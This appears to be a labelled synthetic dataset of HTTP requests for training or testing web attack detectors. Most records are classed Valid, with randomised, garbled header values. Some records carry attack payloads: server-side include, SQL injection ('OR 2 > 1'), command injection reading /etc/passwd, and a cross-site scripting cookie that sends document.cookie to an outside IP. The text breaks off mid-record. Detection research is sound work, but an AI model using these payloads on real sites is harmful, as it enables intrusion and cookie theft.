GET /tO9eoevo.asp?N6gtFte=NG-qu%26&kgir56rl9=objectOho&CDioQNQG7MG=rZcX%40Bqg&rasescchondap=tvzJ1 HTTP/1.0
Host: www.Wjeeotet.com:388
Connection: keep-alive
Accept: image/png, application/zip, audio/basic
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: u-9nvfes;q=0.8, dlol-sR6c;q=0.9, dtOtql-ixcu7x
Cache-Control: max-stale
Client-ip: 197.118.98.197
Cookie: hcetefnasorneT=8332067
Cookie2: $Version="25"
Date: Thu, 27 May 04 02:17:44 UTC
ETag: W/"B_gkpUCYk2l3LIWc"
Expect: 100-continue
From: EthrCsE2@rztsaatbaT.be
If-Modified-Since: Thu, 01 Jul 04 12:05:49 UTC
If-Unmodified-Since: Sat, 04 Mar 06 23:10:29 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jun 06 19:11:32 CET
Max-Forwards: 13
MIME-Version: 7.8
Pragma: Tn='xesoieil'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: pi6o tioeo=itUemme
Range: -023813,9-
Referer: /mIgoNasn/mrti5.conf
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 3.9; oh-ot; rv:7.9.0) Gecko/34252713
UA-CPU: StrongARM
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 799x317
Via: FTP/9.9 www.1lvs.css, 9.4 www.3iO9e.js, 3.6 www.sZsA.shtml:04
Transfer-Encoding: compress
Upgrade: I3r8es/8.7
Warning: 901 2.195.241.77 "iaii3i" "Fri, 29 May 09 17:59:10 GMT"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 568060558126
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24420
Start - Id: 40865
class: SSI
GET /5tmehcrndB/cmjE9BUNOZ@/tgXTcfZwdnMRjPXS-/IOmSciketTonrpmEt51/1UJ25QH-9oa6_82_5/lkWKCvu9/nph-4MW/ioendu/nDYWh/att5nrmai2kadntu/njznxkP7XR6.css?wehrhcgsQvBfsuu=883977&D0WzMw=9104111&e0ab=alHMa85W&isi1mdhhoOytna=%3C%21--++%23odbc++statement++++%3D+%22select++sryh%2C++++n7enyl%2C+axp7nr+from+++staPwOo+++++order+by+++3%2C++++78%2C+++++6%22++--%3E&hnttt=hsnfa&kmailQ.pH=sxuuz%3Baeatmwgeto&RiO9eaIjtl6=t9%3Crtlt%7Cs%5Bvj%25addt&dieRehiritLatdi=711&oobfSoioue=0203628204&Iakeemp=seornnnzoenstylen&vca5bxyAbyf=759&usrQQC9@wp-jO7ou=%2B%7Czensldow%27e&SXuGZWIEFLB=it7&KnKLXwy0_XO=9eqaoeAltsn4it3reU&iTkeM9RrLe2Tuse=eJVs5OOr5 HTTP/1.1
Host: 14.43.41.7:80
Connection: keep-alive
Accept: text/*, audio/x-wav, video/*;q=0.9
Accept-Charset: x-mac-greek;q=0.9
Accept-Encoding: gzip, deflate;q=0.9
Accept-Language: *
Cache-Control: min-fresh=4693
Client-ip: 175.185.183.88
Cookie: 7rshoit5muZn07=0064384;Na=tm3rM2;niu=a inputjoifi5wB
Cookie2: $Version="380"
Date: Thu, 16 Jun 05 02:59:13 UTC
ETag: "sKr@_Vwhn_E5hW1u"
Expect: 100-continue
From: xhslhnd@1eneubz.it
If-Modified-Since: Thu, 08 Apr 04 17:47:58 GMT
If-Unmodified-Since: Tue, 29 Dec 09 24:42:30 UTC
If-Match: "aKPw3Gs64YKJJeJzc"
If-None-Match: "UG7kmIY9R5TH53PVf"
If-Range: "LVPH1NkG@4g7F9t5qiG-"
Max-Forwards: 6384
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: dNre ae1tadjl=gqbi
Authorization: Digest opaque="o8aeoi"
Range: -375,-4
Referer: http://baSi.uk/9ega/IfIuorhl.pl
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/3.8 (X11; U; Open BSD i386 3.0; 0t-im; rv:5.3.2) Gecko/86983708
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: 5.4 161.243.89.169:47, 2.9 www.nedo7.tiff, 5.8 www.ieiEl6e.css
Transfer-Encoding: gzip
Upgrade: saht/3.7, 9sha/5.8, Eossd/8.6, rms/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40865
Start - Id: 23265
class: Valid
GET /ietridoeiu/tq1er3tni/v@dLsSexecfV2/g_-WMVQ89SBe.KlBwM2/nDtl/el9et/dHosYhER4mKcu5ySh/Vls7tnrimc0ac7ez/yn9m4hyealhNpitange/PXCdocument-@XI@8W9.exe? HTTP/1.0
Host: www.4tpliouc.st
Connection: acpml7lo
Accept: */*;q=0.5
Accept-Charset: x-mac-ce;q=0.5, x-mac-chinesesimp, iso-2022-jp, iso-8859-1;q=0.8
Accept-Encoding: identity;q=0.7, identity;q=0.8
Accept-Language: *
Cache-Control: eratheR=rila
Client-ip: 63.155.215.81
Cookie: uTixwgetB-ls-G=aeoafTlA0niotsoi
Cookie2: $Version="481"
Date: Sun, 19 Nov 06 19:19:25 GMT
ETag: "2@ut8TgWDk520dACYX5"
Expect: 100-continue
From: seuezp8x@tfEa7ie.uk
If-Modified-Since: Fri, 19 Mar 10 21:50:10 UTC
If-Unmodified-Since: Mon, 13 Sep 04 24:40:51 UTC
If-Match: *
If-None-Match: "6Dl1QpYQmYNHA-HC.Veh"
If-Range: "mxPweLDoNSgE399Vo-Bw"
Max-Forwards: 703
MIME-Version: 4.6
Pragma: niTqla=blnt
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: Basic azF0MW5yY2k6MGZvc28=
Range: 36-367,16-
Referer: http://www.lhewv4c.de/oatylm/Src3h/sydr/34h7ne/trr7uj.tiff
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.9 (X11; U; Open BSD i586 8.7; na-ho; rv:6.2.8) Gecko/14138694
UA-CPU: MIPS
UA-Disp: 7288,4441,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6614x1041
Via: HTTP/6.1 44.183.126.65, FTP/2.7 www.rNit.css:038, 0.0 www.chsDoin.jpeg
Transfer-Encoding: deflate
Upgrade: atinoz/5.3, liht/0.8, qeeon/5.8, aucer/1.3
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 55.67.110.255
X-Serial-Number: 736748310370
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23265
Start - Id: 15424
class: Valid
GET /ere8Ldwp/@UqreK/t6r.jpg?6ern9ySy0i=oTa&2Areilg4almsat=lertgu%3Aes1%3Fkxa&pt7nrc=4jusbeGltic%25i&hnepsA=861&AygirntyLossui=5447412190&XHpZ@ZQXQ0=30293349&8.gcqp89_=lZTCujWd%40&5CcsRtmpihtBSs=trhnectaw7wget%3Ayrsamt8&tdte=6065&steiaRneeY=i1WswpfgrQ HTTP/1.0
Host: 54.128.134.207
Connection: close
Accept: application/*, video/mpeg;q=0.3, image/gif;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=529
Client-ip: 152.20.138.118
Cookie: hrthtasdcorn=488230;vhuhcd=pICN9;HsEmI0=o\dBdn<Et;ymsuat=i:i
Cookie2: $Version="6"
Date: Fri, 19 Jan 07 18:23:15 GMT
ETag: "2l.48YiwXcr_reAeJH5@"
Expect: 2ba1ae=kVrodu
From: hreEo@mhtthLrava.org
If-Modified-Since: Wed, 25 Nov 09 16:10:58 UTC
If-Unmodified-Since: Thu, 23 Apr 09 19:26:45 GMT
If-Match: "m-R5rsZDs6.Nu37w"
If-None-Match: *
If-Range: "gQV7QS_tTb1UdU3DKc@G"
Max-Forwards: 978
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="noelihmo"
Authorization: NTLM YWl5dHJFb2J0OWVUc2lhYXJldG9xOU9lZ1RlaGU2b1NvdG5lcWF0ZQ==
Range: -590219
Referer: http://www.heduo.com/ieoH.sh
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: nVT1aIa http://www.sraadT.fr
UA-CPU: x86
UA-Disp: 842,1582,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6536x0749
Via: HTTP/9.8 www.hsterr.png, 0.7 www.rbtd.css, FTP/1.2 www.Erci.html
Transfer-Encoding: compress
Upgrade: ncaer/8.0, rbkq/6.1, eos/1.0, ckiws/1.2, 6ln76s/2.0
Warning: 464 www.mnaweo.js "oneuxm" "Sat, 24 Jan 04 18:49:21 UTC"
X-Forwarded-For: 198.220.179.151
X-Serial-Number: 24141
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15424
Start - Id: 41430
class: SqlInjection
PUT /teRMa1o/jyMbf2jb/JbformrWSkX9l21/gaeh6rxvOe2r/WtelneteVnph-Gcc7u/t-rF-Gv03/xzAp-5/lv.shtml? HTTP/1.1
Content-Length: 163
Content-Language: 6Tsmo,ynwDnus,TT
Content-Encoding: identity
Content-Location: /elai/ianl/V7atd/nactX/ffve.pdf
Content-MD5: b1RlZW51d2R5cWdnOXlobQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Aug 07 12:11:03 UTC
Last-Modified: Fri, 06 May 05 01:31:45 UTC
Host: www.undwuei.fr
Connection: TgNS
Accept: video/*, audio/*
Accept-Charset: iso-8859-8-i;q=0.7, ks_c_5601-1987, x-mac-korean, x-mac-chinesetrad;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 181.55.244.233
Cookie: u4AeaWlt=3aiadnaof;Anfc8SsToem=tkehuro;Nme9dhtOnrrl8nJ=:d6hnc zbvtdtdw;1rnusghmYnaTi=6180808;8Qp9RUfIUbetweenf=in;C1r5zand79mtb=+techo
Cookie2: $Version="458"
Date: Mon, 30 Mar 09 05:38:02 CET
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: hbituu@nl5IshaU.be
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Thu, 30 Sep 04 01:13:41 UTC
If-Match: *
If-None-Match: "Ub1oI.0Bnjqt9.p16"
If-Range: *
Max-Forwards: 5
MIME-Version: 0.4
Pragma: eVeccvh='tyavS4t0'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest qop=4eBn
Range: -86
Referer: /t5emjg/nnsh1ear/loeblsle.avi
TE: deflate;q=0.2
Trailer: Date
User-Agent: lnkstm
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: 8ep/9.3 165.94.165.5, 5.4 www.mxotm.gif:18090, oupu/2.5 www.tHmahw7t.tiff:96
Transfer-Encoding: deflate
Upgrade: rht/5.4
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

7EWdh9sYsam7Cf=a7gw5etowsdAnt&at1dbeE1sak=6396379&tfTi=    OR  2 >  1&ittdyO=fn )(bai-ono93weuid&Eaa=40978378&nuTusMenltqhorh=1602&FUes=pm22rr&dtstst1=tnZKiX

End - Id: 41430
Start - Id: 17341
class: Valid
GET /mq@InLj82aLem4/wFc.php?ytnd=n.h&dmv=G&raetnok=lVBAO&nanxcmwthly=509&3idEzi4nl=ic1e24nsefAityyafw&tr2ciahtd=94&henontLp9mssnxm=orzy&aRe=91055627&ineermho62rL3=teMsidzaso&Nbnriis9w9klci=esamsk&ohtrcdea=gJRNXy HTTP/1.0
Host: www.tnHek7n.org
Connection: close
Accept: audio/basic
Accept-Charset: us-ascii, isiri-3342, macintosh
Accept-Encoding: compress, deflate;q=0.6, compress, gzip;q=0.8, identity;q=0.0
Accept-Language: ae1rEGio-isv;q=0.5, pc-vIio5, atQ-fOisSdOm, dt4-hti;q=0.3, tc-ss
Cache-Control: 6='xu'
Client-ip: 192.213.242.232
Cookie: eoeaiutc7sw=e;ZvMriiedts=oeln;ti=nW4cgBjHG;qe=42347;rstiavareoee=ese5tunbvcHlpjid;qi1lnohTse=683330918
Cookie2: $Version="64"
Date: Wed, 28 Mar 07 22:09:35 CET
ETag: W/"XScZFc6C-ytK33GmOIxf"
Expect: 100-continue
From: atnl@pt6tqur.gov
If-Modified-Since: Tue, 29 Aug 06 19:46:43 CET
If-Unmodified-Since: Wed, 06 Jun 07 18:13:42 CET
If-Match: *
If-None-Match: "siFt75G4@BtnxXp4bo"
If-Range: Fri, 15 Oct 04 13:21:59 CET
Max-Forwards: 0
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: rwee nsio=oosT
Range: -891481,4-
Referer: /s88ja/eat7b.jpeg
TE: deflate,trailers,deflate
Trailer: Range
User-Agent: teerlofeddstEnoyot
UA-CPU: 68000
UA-Disp: 7547,506,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 717x8576
Via: FTP/3.2 220.77.149.141:20835, elsTH/7.3 www.seratoEa.shtml, FTP/3.1 www.qpDbny.gif
Transfer-Encoding: deflate
Upgrade: hulh/0.2, aau/8.4, stan/1.1
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 69600
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17341
Start - Id: 10326
class: Valid
GET /r2_._ibDqX9PFD/ercrWQfm/b7NhttpiC/Dexec/4o/uCcLk96ta3i/dm/si4JVLvpRRprWF/dJxkVeM/rXwECV4fWA77QDI/0aH.png?8n3o=ori&aesuut6epseaib=pSH+&asaalwle2=n%3Et+&4nDy=%5Cose&nnskmsghnhzeU=pq5Y6v6&Jqu53o3x=er&ohwrzn5tnRt=t&hxe=oObCxv0ZAK&teeaaLsii=99&uhiaeeog=betAxterm4eflocationiriframeehad&jhjtI7tbtodi=37665486 HTTP/1.0
Host: www.Ii6fuoj.net
Connection: keep-alive
Accept: audio/basic
Accept-Charset: utf-8;q=0.6
Accept-Encoding: 
Accept-Language: hn-t, jnc-tlyetg;q=0.0, eS-n;q=0.0, dEe7sni0-saoej;q=0.6
Cache-Control: max-age=3892
Client-ip: 245.83.65.213
Cookie: 1xtaf=tRN1QSX0vS5r;ess1omeif=ncrhohLjZ;hXdDO=9504992;yaeresilhxn=rNvFxrjs;igo=0;Asd41LWbinR=;like:O
Cookie2: $Version="56"
Date: Sat, 02 Jul 05 01:18:49 GMT
ETag: W/"EYezGROZhzumkOacy"
Expect: teax
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Thu, 23 Mar 06 14:05:15 CET
If-Unmodified-Since: Tue, 16 Mar 04 21:47:08 UTC
If-Match: "hdHdhxdwPB.Ud-iWWI"
If-None-Match: "cZ2R6Ju4NvQNf@K@W"
If-Range: Mon, 29 Dec 08 12:06:17 CET
Max-Forwards: 9
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rfff
Authorization: NTLM ZGlkb1N0aGVEb2ZhZWRyZWVuc3hlTmU5ZmloaXdhYWNoaDJ1dGlC
Range: -708348,-278258
Referer: http://ipeoko.gov/mphtkitl/osrie/oii1feol/sesoEs/0lweee.nsf
TE: chunked
Trailer: From
User-Agent: o0yerribjrasOpeq
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: FTP/9.2 10.204.223.155, HTTP/3.7 164.179.165.206:624, 8.9 www.TuErw0e.js:0316
Transfer-Encoding: identity
Upgrade: ssIo/9.2
Warning: 464 www.t6l1.jpeg "rueaeivla7hs" 
X-Forwarded-For: 69.212.202.217
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10326
Start - Id: 12589
class: Valid
GET /tho/1aris/liZ@NeC4NgpbRj/iyk_O/nupGg2iz0I/teieS/ees/nkeetsran/t9SibG-eqg__H.MXFBl4/36bD1eKFm3.htm? HTTP/1.1
Host: 186.39.155.40
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-roman;q=0.5, x-mac-roman;q=0.2, gb2312;q=0.3, windows-1258, iso-8859-6;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: ana-as4s;q=0.6, 4ew1tae-t, hyQgnasw-o;q=0.5
Cache-Control: no-transform
Client-ip: 204.182.131.81
Cookie: n4acdeaat2dui=966716307;3rgiiomhm=fieA5ts)f\;ifiyoonxs=95238;oieL5hioAjiYD4=ahreifeoFsC
Cookie2: $Version="5"
Date: Wed, 14 Apr 10 18:18:53 UTC
ETag: "9msxFVcv@1EKQ5tlu3"
Expect: 100-continue
From: r2nhMrp@wree.uk
If-Modified-Since: Wed, 10 Sep 08 18:40:08 GMT
If-Unmodified-Since: Thu, 01 Feb 07 05:36:47 GMT
If-Match: "XmGycHs4AXs17jsqcLPP"
If-None-Match: "hJTIwMWAzcCgExrV-"
If-Range: "qU9sXDK_qRSyn7.tFps"
Max-Forwards: 29
MIME-Version: 4.9
Pragma: yiyMaohV=6
Proxy-Authorization: ohlend 5tstwcsv=aehbgNa
Authorization: NTLM YWJwdHNlZXdFbjJlSVlpZXJsc2hybmlwM0xyYm9lMGhzcGljMW44
Range: 132-,3231-699
Referer: http://www.aEOe0aog.biz/pjtioTtj.ace
TE: chunked;q=0.1,chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 3.1; hn-LT; rv:5.6.5) Gecko/07872239
UA-CPU: StrongARM
UA-Disp: 3658,3398,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 280x609
Via: FTP/2.8 232.141.212.118, eptha/3.6 www.srap.jpeg
Transfer-Encoding: egntro; cpgtlB=a7il
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 950 23.61.199.108 "rrrlTggd8Eewtaio" 
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 3472507595174879
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12589
Start - Id: 26284
class: Valid
GET /187rn0M0/cHautWUbvBgH4L9tg/_JYSshutdownIdpasswdJ3f3W.nsf?icev=pvYP2fDO&60vaNscriptHRDiI=a%24&GSQvLd=%24a+te%3Bi%29qlogo+twh&.HxmlAFfStelnetpG=4ou2h&UbRfetjrNto=wTps&g72meeesot=176058&5e=s7cB97K&araett1doAaieo=4107617 HTTP/1.0
Host: 183.212.15.151
Connection: close
Accept: */*;q=0.1
Accept-Charset: ks_c_5601-1987, windows-1252, cp-950
Accept-Encoding: gzip;q=0.0, identity;q=0.4, compress, gzip;q=0.4, deflate
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 199.10.237.36
Cookie: et=19
Cookie2: $Version="1"
Date: Thu, 13 Jul 06 12:39:38 GMT
ETag: "jGVqGdNgXpeLJA_"
Expect: ttsk4vn
From: taeoEwfn@tnh7dio.org
If-Modified-Since: Tue, 06 Dec 05 02:17:58 CET
If-Unmodified-Since: Fri, 03 Oct 08 02:56:42 UTC
If-Match: *
If-None-Match: *
If-Range: "HI-Hv8rVxi.rDtfZ"
Max-Forwards: 07
MIME-Version: 6.1
Pragma: te4aaRtn='uoh5d'
Proxy-Authorization: acru cnsecA=hl44nb3l
Authorization: NTLM YWt0a09yZGFtb2xlbHNFb0U5dHRwOG5lbWlMb2xhb24=
Range: -844,-3965
Referer: /srte/3m2U/dfTtiie8/erDc.htm
TE: trailers,chunked
Trailer: Date
User-Agent: Mozilla/4.7 (compatible; Konqueror/3.9; Linux i586; OnesRmeum)
UA-CPU: 68000
UA-Disp: 509,4481,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3902x9522
Via: 4.2 61.82.4.57
Transfer-Encoding: identity
Upgrade: gh9st/0.8
Warning: 136 113.159.73.52 "qFror" 
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 93545623104
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26284
Start - Id: 43192
class: OsCommanding
GET /bhIdoolief.js?WA-MTfv=%7C+++cat++++%2Fetc%2Fpasswd%7C&eh=L&chelth=7785497686&k.5pCTpx=itihEnmrUev HTTP/1.1
Host: 165.247.91.171:1
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: niuMra=lTtir
Client-ip: 174.221.219.110
Cookie: ev=2071855;DsLBG=426688;uk=50
Cookie2: $Version="045"
Date: Fri, 08 Jul 05 07:44:45 UTC
ETag: "gE.iO--EDoc3u98Y-ab"
Expect: eee7arsi=fomn;adnogm=imetlca
From: dsmHrei2@sentDlSn.biz
If-Modified-Since: Sat, 17 Jan 09 07:52:49 UTC
If-Unmodified-Since: Sat, 18 Oct 08 01:40:49 UTC
If-Match: "GKIJ8CashY@G25_MWiO"
If-None-Match: "SXd-ZzFmuLPOVweuIJ"
If-Range: Sun, 23 Nov 08 17:49:29 GMT
Max-Forwards: 7345
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Digest nonce
Range: 3473-351,462906-
Referer: /selmtcz.htm
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/3.2 (compatible; MSIE 5.7; Linux i386; nhtacXpesi; nNeon)
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 953x846
Via: ttpdeu/3.1 138.106.153.152, 4.3 22.237.198.104
Transfer-Encoding: compress
Upgrade: hi11/1.2
Warning: 231 185.155.94.60 "irqgflweeiAamiop" "Wed, 29 Aug 07 04:28:35 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43192
Start - Id: 4116
class: Valid
POST /NFLiZadmin2_W/j.1wN2usrP4M_2Yn.css? HTTP/1.1
Content-Length: 116
Content-Language: asnMiel,isie
Content-Encoding: compress
Content-Location: /6t5ie/eiljety1/ete5e.php
Content-MD5: b21hZGV5cGVvenRkcmd1bw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 04:01:16 UTC
Last-Modified: Wed, 06 May 09 13:25:21 UTC
Host: www.nitnrzO8de.gov
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-chinesetrad, windows-1253;q=0.6, x-mac-arabic;q=0.1, iso-2022-kr, hz-gb-2312;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=469
Client-ip: 90.59.196.121
Cookie: ahw0tniElT3t1=tlsuisNdaiownf;x3bqJljjidN6=ecRbe3
Cookie2: $Version="692"
Date: Fri, 13 Mar 09 22:26:05 GMT
ETag: "us4d89NA6NiZePn"
Expect: 100-continue
From: tEpEp@tir3gian.cz
If-Modified-Since: Mon, 06 Apr 09 20:57:27 CET
If-Unmodified-Since: Wed, 27 Dec 06 03:45:49 CET
If-Match: "mEtTyOIEZU5sbaIqKWRk"
If-None-Match: *
If-Range: *
Max-Forwards: 378
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: Basic aXNmMzp0eDJueWU=
Range: 149-,88457-
Referer: /ene1aaE.sh
TE: gzip,deflate,trailers
Trailer: Pragma
User-Agent: iftI/7.4.4.0
UA-CPU: StrongARM
UA-Disp: 6182,3319,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 334x3982
Via: 7.2 82.143.216.4, 6.2 169.74.154.61, FTP/5.9 8.170.170.18
Transfer-Encoding: deflate
Upgrade: txgQ/6.8, rwt/5.6, p7law4/7.6, Pi4lm/5.6
Warning: 595 www.endswe0t.htm "rojqzsooogwsngCtsaaa" 
X-Forwarded-For: 116.192.98.218
X-Serial-Number: 13901599653
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

sn=tDi&W3inputK=2e1co&gPkiCDePqVY=tuio8oiNo5&mbmova5emofnslH=IaotEuoiframeleiphpconnecteT&ttHaWei6aaiqoa=rZLoVFXWPZg

End - Id: 4116
Start - Id: 48270
class: XSS
PUT /2Esmscaemidah/Lenio2vr/rg/aWG@c_0j3/fdenTrz/BY@T5all5ftpUKmetaFm/eIxiX9iYCW/ot.nsf? HTTP/1.0
Content-Length: 232
Content-Language: En,a1tctn,aonak
Content-Encoding: compress
Content-Location: http://Ejpe.net/otho/Saadqocn/sacn/7ehsCZO/4renCeo.zip
Content-MD5: YjJld3dyN2FpNWZka3JlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Oct 05 04:24:49 UTC
Last-Modified: Wed, 07 Jul 04 07:26:53 GMT
Host: 232.105.3.79
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 0mR5sa-sswtqabr;q=0.6, hydIrs-hibpta4f;q=0.6, fe2Mh-oaltd;q=0.1
Cache-Control: min-fresh=876
Client-ip: 231.0.127.122
Cookie: 5aOAe=imbt3flhoi;s6gb=<style    ><!--</style  ><script   >[window.open('http://124.57.217.77/er.bin'+document.cookie);]//--></script   >
Cookie2: $Version="69"
Date: Mon, 17 Dec 07 02:04:18 CET
ETag: W/"MQMTl9fYKleFv-7sL"
Expect: nii7=hdfni
From: c2qkS@anonc.st
If-Modified-Since: Wed, 06 Jun 07 05:20:29 CET
If-Unmodified-Since: Wed, 01 Oct 08 03:37:22 GMT
If-Match: "GkG33ye1KMTzc740j"
If-None-Match: "SfBPXv3IOdI1G5YO8y"
If-Range: "xxnSlQ6arac4a6jpo"
Max-Forwards: 2139
Pragma: wrpe=ilBhge
Authorization: tlne tlep=taOa
Range: -62871,-3,-29358
Referer: /ddeqooAt/Bnevoloh.tiff
TE: trailers,trailers
User-Agent: d8zUHtU9 http://www.soaAaO.fr
UA-CPU: 68000
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8148x3315
Via: 4.9 www.a4nuoo.tiff, 8.0 www.uIss.jpeg
Transfer-Encoding: identity
Warning: 615 37.132.230.182 "xwbo0e" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

d7bsj=x &immetmz=Otcat/dadnbl8autoexecb Ikd&phMshutdownF_32=atehttpsn9b&ahe2eekg=6&0rCZ0di=etbauAo2sn&ctwmusfjbuRc=05&ltzoiuyboI=acceptcatHecooroeexp_c&aeuy1Sktge=ebcaeainph-nsco&@v9ENC6Kowq=to 1tuaexecR&lE=eI1L6Ew&egassaMiisy=815

End - Id: 48270
Start - Id: 25388
class: Valid
GET /uk0rdn/aj9olH_8Of_QW/rhtea/wwgaGn/hcagokt50tLikfnr/Extermtboot.inilGusLnlibZR/i.vU843JokoZvqo.ll.mdb?dteffarsdsatotl=haaet%7Cs%25tnlinkiab&jat3qt3bu=611849&aeeS9yetA=92038226&oHstdincQ=eD3Gm&n4mh1iniml=rLNWrjjlI.pj&ietox8=plohecrpiorrsg&duypdsGt5tnutwy=whwN2h HTTP/1.0
Host: www.0rzwmeaae.net:521
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-icelandic, isiri-3342, iso-2022-jp;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=818
Client-ip: 45.139.165.17
Cookie: osOhortejgns=7668675;rzaiheoot1i=ndMtdtinrhzb~window.opendba
Cookie2: $Version="4"
Date: Sun, 05 Apr 09 22:23:19 GMT
ETag: W/"cAK805fzQkE8EYs0Vg1w"
Expect: 100-continue
From: drrovE@debi2e.fr
If-Modified-Since: Tue, 13 Apr 04 13:05:29 GMT
If-Unmodified-Since: Wed, 13 May 09 22:04:41 CET
If-Match: *
If-None-Match: *
If-Range: "483FJhR_fGwoxOmnv66q"
Max-Forwards: 55
MIME-Version: 3.1
Pragma: 94aO=tec4t
Proxy-Authorization: NTLM Yk9lb3N0ZWRvbXVtYXNpbXQzZXRzZHh3Y2hjV2F3dG02aW8=
Authorization: Digest response="Df2C3a0Edb29e86C1Cd76A9Bb2E2fF0b"
Range: 047-,776-
Referer: /1uwtE/yrass7Te/bmtitsg/iirajf/ts6isyA.shtml
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/9.1 (Windows; U; Win98 4.5; as-rs; rv:2.4.9) Gecko/87714391
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: gzip
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 361 189.181.68.53 "fIjyiokT66aez" "Tue, 06 Apr 10 13:42:10 UTC"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 927015568705209514
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25388
Start - Id: 21257
class: Valid
GET /wagah/n3zyJqz82_AprvdO1sv.dll? HTTP/1.1
Host: www.i9tnwaboet.it
Connection: close
Accept: */*
Accept-Charset: windows-1254, x-mac-roman
